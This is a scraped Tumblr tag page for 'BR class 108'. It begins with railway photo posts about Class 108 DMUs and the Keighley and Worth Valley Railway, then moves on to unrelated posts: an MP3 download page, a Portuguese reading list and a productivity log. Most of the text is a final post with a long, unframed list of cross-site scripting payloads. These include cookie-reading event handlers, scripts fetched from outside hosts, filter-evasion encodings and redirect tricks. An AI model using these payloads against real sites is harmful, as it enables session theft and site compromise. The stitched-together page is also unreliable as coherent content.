#BR class 108
Explore tagged Tumblr posts
Text
![Tumblr media](https://64.media.tumblr.com/7480b9c989091d713343fd6dd8ec2f96/a7ca713a832f3fb1-85/s540x810/7782705118ec7e81c4f7932808344c9566466d68.jpg)
Class 108 DMU at the Severn Valley's autumn steam gala, 21/09/2024.
6 notes
·
View notes
Text
Oops
#trains#real life trains#BR Class 108#BR Class 117#BR Mk1 Coach#model railway#model trains#derailment#ttte#diesel railcar
2 notes
·
View notes
Text
![Tumblr media](https://64.media.tumblr.com/d0a896131319feb0ad6f913ace85d413/fd550a05724df528-fd/s540x810/99c166000b61b8adbe1fc81a8eb919a11085893d.jpg)
David Mitchell (not that one), we thank you for this stunning photograph.
Oxenhope, the terminus of the 5 mile branch line from Keighley, is the scene for this delightful photo of a Class 108 DMU, in its original guise of BR Green with white 'whiskers' on the panel.
The branch line closed in June 1962 but was revived by the local community and dedicated enthusiasts in 1968, who formed an early and very influential preservation society. We now know it as the Keighley and Worth Valley Railway.
December 1961
#Keighley#Worth Valley#Oxenhope#a beautiful photo#melancholic on that day#but things kinda became good#Class 108#DMU#ttte#ttte daisy
7 notes
·
View notes
Text
<center><img class="img" title="Yemi Alade - True Love" alt="Yemi Alade - True Love.mp3" src="https://dl4.wapkizfile.info/img/a85c2b5d67dd6d223cef1f7650fade67/gaanamp3+wapkiz+mobi/cover.jpg" width="200px" height="200px"/></center><h2Â style="font-family:georgia,garamond,serif;font-size:px;color:green">True Love by Yemi Alade</h2><h3 id="artistname" style="text-align:left; font-family:georgia,garamond,serif;font-size:18px;color:black"><b>Artist Name: <b><span style="color:OrangeRed"><a href= "/site-search.html?to-q=Yemi Alade" style='text-decoration: none'>Yemi Alade</a></span></h3><h3Â style="text-align:left; font-family:georgia,garamond,serif;font-size:18px;color:black"><b>Track Title: <b><span style="color:OrangeRed">True Love</span></h3><h3 style="text-align:left; font-family:georgia,garamond,serif;font-size:18px;color:black"><b>Recorded: <b><span style="color:OrangeRed"><a href= "/site-search.html?to-q=Yemi Alade" style='text-decoration: none'>2020</a></span></h3><h3 style="text-align:left; font-family:georgia,garamond,serif;font-size:18px;color:black"><b> Produced By: <b><span style="color:Orangered">Producer </span></h3><h3 style="text-align:left; font-family:georgia,garamond,serif;font-size:18px;color:black"><b>Category: <b><span style="color:OrangeRed"> Audio</span></h3><h4 style="text-align:left; font-family:georgia,garamond,serif;font-size:16px;color:black"><b>description </b></h4>[b]Take A Listen Below[/b]<br/><br/><center><a href="/site-view.html?to-id=http://trendybeatz.com.ng/page-news/108/yemi-alade-true-love-mp3-download-audio.html" rel="nofollow" style="background-color: #008000; border-radius: 5px; color: white; padding: 10px 24px; text-align: center; font-size: 13px; font-weight: 600;">DOWNLOAD MP3</a></center><br/>
1 note
·
View note
Text
A META: LER 1 LIVRO POR DIA, EXCETO SE FOR UM CALHAMAÃO, DAÃ Ã UMA 1 SEMANA HEHEHE
1. HARRY POTTER 1 2. HARRY POTTER 2 3. HARRY POTTER 3 4. HARRY POTTER 4 5. HARRY POTTER 5 6. HARRY POTTER 6 7. HARRY POTTER 7 8. WOMAN AT POINT ZERO 9. THE INFERNO 10. GIRL, INTERRUPTED 11. THE PLAYS OS OSCAR WILDE 12. THE CASE BOOK OF SIR SHERLOOK SHOLMES 13. NINETEEN EIGTHY-FOUR 14. ANIMAL FARM 15. THE TREE MUSKETEERS 16. THE CACHER IN THE RYER 17. FOR WHOM THE BELL TOLLS 18. THE WITCHES 19. A CASA SOTURNA 20. ANNA KARIENNINA 21. A MONTANHA MÃGICA 22. DRÃCULA 23. JAMES JOYCE 24. EM BUSCA DO TEMPO PERDIDO 25. COMTOS COMPLETOS DO OSCAR WILDE 26. CONTOS COMPLETOS DO CAIO FERNANDO 27. NIX 28. DAVID COPPERFIELD 29. O DIA EM QUE SHERLOCK HOLMES MORREU 30. OS IRMÃOS KARAMÃZOV 31. GUERRA E PAZ 32. MULHERES QUE CORREM COM OS LOBOS 33. O ILUMINADO 34. IT A COISA 35. OUTSIDER 36. A ESPERA DE UM MILAGRE 37. SALÃM 38. A  CAIXA DE GWENDI 39. O INSTITUTO 40. MS MERCEDES 41. STEPEHN KING 42. CORAÃÃO DAS TREVAS 43. PEDRO PÃRAMO 44. A MULHER NO ESCURO 45. ATORMENTADA 46. POR TRÃS DE SEUS OLHOS 47. PACIÃNTE SILENCIOSA 48. PEQUENAS REALIDADES 49. LARANNJA MECÃNICA 50. O FIM DA INFÃNCIA 51. BLADE RUNNER 52. REUNORAANCER 53. O FIM DA ETERNIDADE 54. O HOMEM INVISÃVEL 55. O CONTO DA AIA 56. OS TESTAMENTOS 57. MATADOURO CINCO 58. A REVOLUÃÃO DOS BICHOS BR 59. PONTO ÃMEGA 60. SUA VOZ DENTRO DE MIM 61. JANE EYRE 62. ENSAIO SOBRE A CEGUEIRA 63. SOL à PARA TODOS 64. O RETRATO DE DORYAN GRAY 65. A TRAGÃDIA DE OTELO, O MOURO DE VENEZA 66. MADAME BOVARY 67. SONHO DE UMA NOITE DE VERÃO 68. MACBETH 69. ROMEU DE JULIETA 70. O NOME DA ROSA 71. A ALAMEDA DE NORTHANGER 72. O PAI GORIOT 73. O LIVRO DE MORIARTY 74. O SIGNO DOS QUATRO 75. O DIÃRIO DE MIRIAM 76. O APANHADOR NO CAMPO DE CENTEIO BR 77. ADVERSÃRIO SECRETO 78. O  DOS VENTOS UIVANTES 79. O CÃO DOS BASKERVILLE 80. O AMOR NOS TEMPOS DO CÃLERA 81. CEM ANOS DE SOLIDÃO 82. CRÃNICA DE UMA MORTE ANUNCIADA 83. DO AMOR E OUTROS DEMÃNIOS 84. O REI DE HAVANA 85. DOZE CONTOS ( ESPANHOL) 86. O VELHO E O MAR 87. A PEQUENA SEREIA 88. ALICE 89. MONDION 1 90. MONDION 2 91. MONDION 3 92. GOOD OMENS 93. s. BERNARDO 94. CAPITÃES DA AREIA 95. CLARA DOS ANJOS 96. MEMÃRIAS PÃSTUMAS DE Brás Cubas 97. TERRA SONABULA 98. AS INTERMITÃNCIAS DA MORTE 99. A HORA DA ESTRELA 100. AINDA SOU EU 101. DEPOIS DE VOCà 102. ESTAMOS BEM 103. O SEGREDO DO MEU MARIDO 104. OBJETOS AFIADOS 105. ONDE ESTIVERES A NOITE 106. LEVE-ME COM VOCà 107. A CINCO PASSOS DE VOCà 108. SHARP OBJECTS 109. PEQUENAS REALIDADES 110. O SEGREDO DO MEU MARIDO 111. ESTAMOS BEM 112. ELANOR E PARK 113. ATORMENTADA 114. A MULHER NO ESCURO 115. POR TRÃS DE SEUS OLHOS 116. SIGNO DOS 4 117. AINDA SOU EU 118. CORAÃÃO DAS TREVAS 119. TERRA SONÃMBULA 120. HAMBLET 121. NÃS 122. REDOMA DE VIDRO 123. CLARA DOS ANJOS 124. MEMÃRIAS PÃSTUMAS DE BRÃS CUBAS 125. A HORA DA ESTRELA 126. ILHAS DE DISTÃNCIA 127. INSTRUMENTOS MORTAIS 1 128. INSTRUMENTOS MORTAIS 2 129. INSTRUMENTOS MORTAIS 3 130. INSTRUMENTOS MORTAIS 4 131. INSTRUMENTOS MORTAIS 5 132. INSTRUMENTOS MORTAIS 6 133. AMERICANAH 134. O CAMINHO DE CASA 135. HIBISCO ROXO 136. FICA COMIGO 137. ALEGRIAS DA MATERNIDADE 138. NO FUNDO DO POÃO 139. CIDADà DE SEGUNDA CLASSE 140. ÃSULA 141. MRS. DALLOWAY 142. AO FAROL 143. ÃLTIMO DEUS 144. ALICE 145. A MENINA SUBMERSA 146. VIDAS SECAS 147. INTERMITÃNCIAS DA MORTE 148. UM ESTUDO EM VERMELHO 149. APANHADOR NO CAMPO DE CENTEIO 150. O SILÃNCIO DOS INOCÃNTES 151. PEDRO PARAMO 152. ORLANDO 153. A PEQUENA SEREIA
--------------------------------------------------------- 1. O FILHO DE MIL HOMENS 2. A MAQUINA DE FAZER ESPANHÃIS 3. HOMENS IMPRUDENTEMENTE POÃTICOS 4. A DESUMANIZAÃÃO 5. O REMORSO DE BALTAZAR SEPAPIÃO 6. O NOSSO REINO
2 notes
·
View notes
Text
Productivity log #108
04-11-2019 - 10-11-2019
These logs are a good way to regain perspective for me, after turbulent days might have thrown me off track. Alright!
Monday
Time just sorta ran away from me. I wanted to get something done, but now it's 23:32 and I need to hit the hay for work tomorrow. Tomorrow I'll get something done!
Tuesday
I did things! It was a lot of pingpong between programming and youtube and discord whatnots, but I did stuff, including streamlining the TCP connection in my thingy! Woop! Next up sorta, make a sample repository file and implement the design into the repository class.
Wednesday
The time sorta ran from me, as it got later and later and suddenly it was midnight. Sorry, programming streak! One day still counts as a streak!!
Thursday
I was busy packing all day after a long work day. Nothing productive got done!
Friday
Officially I'm working from home. In reality I went out at 10 and headed off to the airport. At the end of the day, I am settled in a hotel in Glasgow, Scotland, ready for Bronyscot!
Saturday
Bronyscoooot!
Sunday
RockNessiiiiie!
Conclusion
The latter half of the week completely overshadowed the first, that looks to have been good from my writing, but I can't remember!
1 note
·
View note
Text
\x27\x3e\x3cimg\x20src\x3dx\x20onerror\x3d\x27alert(\x2fXSS\x2f)\x27 home'-alert(document.cookie)-'a javascript:onload('javascript:alert(1)') aaa<%tag onmouseover="($)'a').html('<'%2b'h1>xss'))">hover here aaa<%tag style=xss:expression(alert('XSS'))> <meta http-equiv="refresh" content='0; url="http://www.ey.com"> =https%3A%2F%2Fmalicous2.com"'/><meta http-equiv="refresh" content='0; url="http://www.ey.com"> ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> '';!--"<XSS>=&{()} 0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" <script/src=data:,alert()> <marquee/onstart=alert()> <video/poster/onerror=alert()> <isindex/autofocus/onfocus=alert()> <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert("XSS")> <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> <a onmouseover="alert(document.cookie)">xxs link</a> <a onmouseover=alert(document.cookie)>xxs link</a> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=# onmouseover="alert('xxs')"> <IMG SRC= onmouseover="alert('xxs')"> <IMG onmouseover="alert('xxs')"> <IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img> <IMG SRC=javascript:alert( 'XSS')> <IMG SRC=javascript:a& #0000108ert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS');"> <IMG SRC="   javascript:alert('XSS');"> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> <<SCRIPT>alert("XSS");//<</SCRIPT> <SCRIPT SRC=http://ha.ckers.org/xss.js?< B > <SCRIPT SRC=//ha.ckers.org/.j> <IMG SRC="javascript:alert('XSS')" <iframe src=http://ha.ckers.org/scriptlet.html < \";alert('XSS');// </script><script>alert('XSS');</script> </TITLE><SCRIPT>alert("XSS");</SCRIPT> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS')"> <IMG DYNSRC="javascript:alert('XSS')"> <IMG LOWSRC="javascript:alert('XSS')"> <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> <IMG SRC='vbscript:msgbox("XSS")'> <IMG SRC="livescript:[code]"> <BODY ONLOAD=alert('XSS')> <BGSOUND SRC="javascript:alert('XSS');"> <BR SIZE="&{alert('XSS')}"> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> exp/*<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'> <STYLE TYPE="text/javascript">alert('XSS');</STYLE> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <XSS STYLE="xss:expression(alert('XSS'))"> <XSS STYLE="behavior: url(xss.htc);"> ºscriptÊalert(¢XSS¢)º/scriptÊ <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <TABLE BACKGROUND="javascript:alert('XSS')"> <TABLE><TD BACKGROUND="javascript:alert('XSS')"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));"> <!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]--> <BASE HREF="javascript:alert('XSS');//"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> <? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <A HREF="http://66.102.7.147/">XSS</A> 0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-" veris-->group<svg/onload=alert(/XSS/)// #"><img src=M onerror=alert('XSS');> element[attribute='<img src=x onerror=alert('XSS');> [<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ] %22;alert%28%27RVRSH3LL_XSS%29// javascript:alert%281%29; <w contenteditable id=x onfocus=alert()> alert;pg("XSS") <svg/onload=%26%23097lert%26lpar;1337)> <script>for((i)in(self))eval(i)(1)</script> <scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt> <sCR<script>iPt>alert(1)</SCr</script>IPt> <a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a> '">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)> <script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script> <script>alert(document.cookie)</script>"> <img/id="confirm(1)"/alt="/"src="/"onerror=eval(id)>'"> <img src="http://www.shellypalmer.com/wp-content/images/2015/07/hacked-compressor.jpg"> <svg onload="void 'javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d %0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e'; "></svg> %253Cscript%253Ealert('XSS')%253C%252Fscript%253E <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onoffline="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onpagehide="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onpageshow="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onpopstate="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onresize="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onstorage="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onunload="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onblur="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onchange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncontextmenu="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oninput="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oninvalid="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onreset="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onsearch="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onselect="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onsubmit="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onkeydown="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onkeypress="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onkeyup="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onclick="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondblclick="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmousedown="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmousemove="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmouseout="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmouseover="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmouseup="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmousewheel="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onwheel="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondrag="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondragend="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondragenter="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondragleave="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondragover="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondragstart="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondrop="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onscroll="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncopy="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncut="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onpaste="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onabort="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncanplay="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncanplaythrough="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncuechange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondurationchange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onemptied="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onended="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onloadeddata="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onloadedmetadata="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onloadstart="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onpause="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onplay="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onplaying="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onprogress="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onratechange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onseeked="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onseeking="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onstalled="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onsuspend="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ontimeupdate="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onvolumechange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onwaiting="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onshow="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ontoggle="alert(String.fromCharCode(88,83,83))"> <META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)"; <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> <INPUT TYPE="BUTTON" action="alert('XSS')"/> "><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1> "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> "></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder="0%EF%BB%BF "><h1><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(document.cookie)"></IFRAME>123</h1> "><h1><iframe width="420" height="315" src="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" allowfullscreen></iframe>123</h1> ><h1><IFRAME width="420" height="315" frameborder="0" onmouseover="document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr g'"></IFRAME>Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250 <IFRAME width="420" height="315" frameborder="0" onload="alert(document.cookie)"></IFRAME> "><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1> "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> <iframe src=http://xss.rocks/scriptlet.html < <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> <iframe  src="	javascript:prompt(1)	"> <svg><style>{font-family:'<iframe/onload=confirm(1)>' <input/onmouseover="javaSCRIPT:confirm(1)" <sVg><scRipt >alert(1) {Opera} <img/src=`` onerror=this.onerror=confirm(1) <form><isindex formaction="javascript:confirm(1)" <img src=``
 onerror=alert(1)
 <script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script> <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? <iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> <script /**/>/**/alert(1)/**/</script /**/ "><h1/onmouseover='\u0061lert(1)'> <iframe/src="data:text/html,<svg onload=alert(1)>"> <meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/> <svg><script xlink:href=data:,window.open('https://www.google.com/') </script <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} <meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> <iframe src=javascript:alert(document.location)> <form><a href="javascript:\u0061lert(1)">X</script><img/*/src="worksinchrome:prompt(1)"/*/onerror='eval(src)'> <img/  src=`~` onerror=prompt(1)> <form><iframe  src="javascript:alert(1)" ;> <a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" >X</a http://www.google<script .com>alert(document.location)</script <a href=[�]"� onmouseover=prompt(1)//">XYZ</a <img/src=@ onerror = prompt('1') <style/onload=prompt('XSS') <script ^__^>alert(String.fromCharCode(49))</script ^__^ </style ><script :-(>/**/alert(document.location)/**/</script :-( �</form><input type="date" onfocus="alert(1)"> <form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'> <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ <iframe srcdoc='<body onload=prompt(1)>'> <a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a> <script ~~~>alert(0%0)</script ~~~> <style/onload=<!-- >alert(1)> <///style///><span %2F onmousemove='alert(1)'>SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1) "><svg><style>{-o-link-source:'<body/onload=confirm(1)>' <blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera} <marquee onstart='javascript:alert(1)'>^__^ <div/style="width:expression(confirm(1))">X</div> {IE7} <iframe// src=javaSCRIPT:alert(1) //<form/action=javascript:alert(document.cookie)><input/type='submit'>// /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ </font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style> <a/href="javascript: javascript:prompt(1)"><input type="X"> </plaintext\></|\><plaintext/onmouseover=prompt(1) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera} <a href="javascript:\u0061le%72t(1)"><button> <div onmouseover='alert(1)'>DIV</div> <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> <a href="jAvAsCrIpT:alert(1)">X</a> <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <var onmouseover="prompt(1)">On Mouse Over</var> <a href=javascript:alert(document.cookie)>Click Here</a> <img src="/" =_=" title="onerror='prompt(1)'"> <%<!--'%><script>alert(1);</script --> <script src="data:text/javascript,alert(1)"></script> <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<><iframe/src=javascript:confirm(1) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div> http://www.<script>alert(1)</script .com <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe> <svg><script ?>alert(1) <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe> <img src=`xx:xx`onerror=alert(1)> <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> <meta http-equiv="refresh" content="0;javascript:alert(1)"/> <math><a xlink:href="//jsfiddle.net/t846h/">click <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> <svg contentScriptType=text/vbs><script>MsgBox+1 <a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ <script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script <object data=javascript:\u0061le%72t(1)> <script>+-+-1-+-+alert(1)</script> <body/onload=<!-->
alert(1)> <script itworksinallbrowsers>/*<script* */alert(1)</script <img src ?itworksonchrome?\/onerror = alert(1) <svg><script>//
confirm(1);</script </svg> <svg><script onlypossibleinopera:-)> alert(1) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe <script x> alert(1) </script 1=2 <div/onmouseover='alert(1)'> style="x:"> <--`<img/src=` onerror=alert(1)> --!> <script/src=data:text/javascript,alert(1)></script> <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> "><img src=x onerror=window.open('https://www.google.com/');> <form><button formaction=javascript:alert(1)>CLICKME <math><a xlink:href="//jsfiddle.net/t846h/">click <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> <a href="data:text/html;blabla,<script 